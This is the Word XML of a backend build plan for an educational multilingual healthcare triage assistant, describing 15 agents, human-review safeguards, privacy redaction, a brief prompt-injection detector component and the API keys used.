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3864"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Multimodal Healthcare Triage Assistant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Full Backend Build Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Agents, backend files, workflow, security, and definition of done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Disclaimer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is an educational prototype for triage-support purposes only. It is not a medical device. It does not diagnose, prescribe, or replace a qualified health professional. All data used is synthetic or public.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This plan is written so a build bot can follow it step by step. The words "agent" and "module" mean one unit with one job. Several agents are deliberately rule-based, not AI, because safety decisions should be predictable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">1. What the Problem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Real-world problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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What the system must do</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Staff are overloaded and queues are long</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Sort patients by urgency and show the sickest first</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Patients speak many languages, by voice or text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Voice to text, translation, mixed Hindi-English understanding</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Reports arrive as scans or PDFs</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Read them, pull out values, and flag abnormal ones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Information is often missing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Detect gaps and suggest questions for the health worker</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AI must not act like a doctor</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Stay non-diagnostic, advisory, and reviewer-facing only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Health data is sensitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Consent, anonymization, access control, no leaks, audit trail</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Referrals are slow and messy</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Prepare a clean handoff note for higher facilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Follow-ups are forgotten (maternal, chronic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Draft reminders that a human approves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Core rules for every part of the design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Rules decide urgency, and AI only organizes and explains. AI can raise a risk level but never lower it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A qualified human approves everything before it is final.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When unsure, escalate to a human and never guess.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Anything leaving the machine is redacted first, and raw audio, images, and files never leave.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A step that has already succeeded is never run again.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">2. The 15 Agents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgraded original five</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Intake Agent (agents/intake.py)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Turn the patient's words into structured facts: complaint, onset, duration, severity, age, sex, pregnancy, conditions, medicines mentioned, and a timeline. Each fact carries the exact quote it came from, and facts without a quote are dropped.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One LLM call with a strict output schema and few-shot examples, using one automatic repair retry if the output does not match the schema.</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Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redacted English text plus the scenario profile.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Output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Symptom Record, passed to the Vitals and Lab Analyst and the Follow-Up Planner.</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Gemini.</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Groq, then local model, then a basic keyword extractor that marks the case "Insufficient information."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Document and Vision Agent (agents/document.py)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Read uploaded lab reports and prescriptions and return clean text and tables.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Local PaddleOCR (Hindi and English), run inside the upload sandbox. An optional image description step uses a local medical vision model, which describes only what is visible and gives no interpretation.</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Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sanitized file pages.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Output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raw table rows with source quotes, passed to the Vitals and Lab Analyst.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 (local only, so images never leave).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Tesseract. If both fail, the file is marked "unreadable, needs manual entry."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Triage and Risk Agent (agents/triage.py)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Assign Red, Amber, Green, or Insufficient Information. A rules engine produces the category. The LLM writes only the plain-language reason, using a bounded ReAct loop (section 5).</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Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Symptom Record, lab findings, scenario rule pack, guideline citations.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Output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Risk category, triggered rules, reasoning summary, passed to the Verifier.</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Gemini for the rationale only.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Groq, then template text built from the triggered rules. The category itself never depends on an API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Safety and Privacy Agent (agents/safety.py)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Four duties. Redaction pass 1 uses patterns (Aadhaar, PAN, phone, email) in any language. Redaction pass 2 finds names and places in English text. The input check is performed with the Sentinel. The output check blocks diagnosis, treatment, and drug-dose language, then adds the disclaimer.</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Presidio with custom Indian recognizers, a name and address gazetteer, and a medical-term deny list (to stop drugs and diseases being mistaken for names).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If it fails, it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">fails closed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. The case is held in quarantine and nothing proceeds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Referral and Handoff Agent (agents/referral.py)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Build the final Triage Note, a short referral summary for a higher facility, and a plain-language reviewer summary. Translate back to the patient's language when needed.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Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> All verified case sections.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Output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Triage Note draft in the output format (section 8) delivered to the review queue.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Gemini.</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Groq, then a fixed template filled from the structured fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">New ten</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Gatekeeper Agent (code in store.py, called by main.py)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Verify login token, role, facility, and consent. Create the case with a pseudonymous ID and its idempotency key. No consent means the case never starts.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None by design. If it cannot verify, the request is rejected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Injection Sentinel Agent (agents/safety.py)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Detect malicious instructions hidden in patient text, voice transcripts, or report text. Runs first on raw input and again on every derived text (transcript, OCR, translation).</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A layered pattern library (section 9). A cheap LLM judge is called only for borderline scores.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Groq (borderline cases only).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Pattern rules alone, and any uncertain text is quarantined and flagged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Language and Voice Agent (agents/intake.py)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Voice to text, language detection, and translation to English, keeping the original text alongside. Translation back is used for referral and reminder text.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faster-whisper and IndicTrans2 locally first. Sarvam is the fallback for translation, and for audio only if the synthetic-audio flag is on.</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Sarvam (fallback only).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Local models, then the case is marked "needs interpreter" and goes to the reviewer with the original text.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Scenario Router Agent (agents/triage.py)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Pick the rule pack and prompt profile: outpatient queue, occupational screening, campus fever, maternal follow-up, chronic check-in, or camp screening. It also sets the list of required fields for that scenario.</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The declared scenario first, then rules on keywords. The LLM is used only if the two disagree.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 normally.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Default to the general outpatient profile, the most cautious one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Vitals and Lab Analyst Agent (agents/document.py)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Normalize values and units, compare them to reference ranges (adjusted for age, sex, pregnancy), and flag abnormal or critical values. Completely deterministic.</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Unknown test names are listed as "unrecognized, reviewer to check."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Clinical Knowledge Agent (rag.py)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Fetch guideline passages (NHM, MoHFW, IMNCI, WHO ETAT, ICMR, NCDC) that back each red flag, plus referral criteria. It returns the passage, source, and section, or the words "no guideline match."</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Hybrid search (keyword plus meaning), reranking, top 3 to 5 passages. The index holds public documents only.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 (local embeddings).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Keyword-only search.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Follow-Up Planner Agent (agents/intake.py)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Compare the record with the required-fields list and produce a missing-information list, plus 3 to 5 questions for the health worker to ask, ranked by triage importance.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Gemini.</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Pre-written question templates per missing field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Queue Scheduler Agent (agents/triage.py)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Compute the priority score from category, vital-sign abnormality, age extremes, pregnancy, conditions, and waiting time (so older cases do not starve). Every Red case triggers an immediate dashboard alert.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Sort by category then arrival time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">14. Verifier Agent (agents/safety.py)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A second opinion. It checks that each extracted fact is supported by its quote, that the risk reasoning matches the rules, and that nothing diagnostic slipped in. It uses a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">different model family</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the one that wrote the content. It may raise the risk level or flag the case, and it can never lower it.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Groq.</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Deterministic checks only (quote must appear in the source text), and the case is marked "unverified by AI."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">15. Reminder and Outreach Agent (agents/referral.py)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Job:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Draft follow-up reminders for maternal and chronic cases. Drafts are saved only after reviewer approval, and nothing is ever sent automatically.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Built with:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Templates, with local translation for the patient's language.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Key:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> None.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> English template.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">3. The 12 Backend Files (Unchanged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File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Updated contents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main.py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All endpoints (section 7), auth and role checks, rate limits, idempotency-key handling, file-upload sandbox entry, generic error responses</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config.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Loads keys and secrets from environment, model registry (agent to provider, model, temperature, timeout, allow_external flag), token budgets, retention time, thresholds, feature flags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schemas.py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Strict models for CaseState, SymptomRecord, LabResult, TriageNote, ReviewAction, API envelopes. Responses use whitelisted fields so extra data cannot leak</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graph.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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The workflow engine. Wraps every agent in the idempotent step runner, holds checkpoints, pauses for human review, resumes after review</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agents/intake.py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Intake, Language and Voice, Follow-Up Planner</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agents/document.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Document and Vision, Vitals and Lab Analyst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agents/triage.py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Triage and Risk, Scenario Router, Queue Scheduler</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agents/safety.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Safety and Privacy, Injection Sentinel, Verifier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agents/referral.py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Referral and Handoff, Reminder and Outreach</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tools.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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The LLM Gateway (provider calls, retry, fallback, egress guard, cache, token counter), STT, translation, OCR, lab lookup, redaction helpers, queue formula, file sanitizer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rag.py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Clinical Knowledge Agent: ingestion, chunking, indexing, hybrid search, reranking, citation formatting</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store.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="67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Database, Gatekeeper functions, users, roles, consent, field encryption, step ledger, outbox, audit chain, retention purge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Supporting files (not counted in the 12)</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prompts/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds one prompt file per agent plus a shared safety preamble and few-shot examples.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rulepacks/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds red-flag rules per scenario with guideline sources, lab reference ranges, queue weights, and the multilingual injection pattern list.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data/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds the public guideline PDFs, synthetic patients, narratives, synthetic report files, and a hand-labeled gold set.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dashboard/app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the Streamlit reviewer dashboard.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tests/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds unit, safety red-team, duplicate-execution, and leak tests, plus an evaluation script.</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.env.example, Dockerfile, docker-compose.yml, and README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the disclaimer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">4. API Keys (4 Total, All Free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00"/>
        <w:gridCol w:w="25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Key</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Where to get it</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Used by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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GEMINI_API_KEY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Google AI Studio</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Intake, Triage rationale, Follow-Up Planner, Referral</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Main reasoning model, with a generous free tier</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GROQ_API_KEY</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Groq Console</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Verifier, Sentinel (borderline only), fallback for all LLM tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Fast open-weight models and a different model family for independent checks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SARVAM_API_KEY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Sarvam AI dashboard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Language and Voice fallback</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Strong Indian-language translation and speech</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HF_TOKEN</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Hugging Face settings</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Build time only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Downloads IndicTrans2, embeddings, reranker, and vision models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Two internal secrets are also needed. They are not provider keys: a JWT signing secret and a data-encryption key, both generated locally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Check before you rely on this:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> free-tier limits, model names, and data-use terms change often. Some free tiers may use inputs to improve their products. This is acceptable only because all data here is synthetic and redacted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Token-saving rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
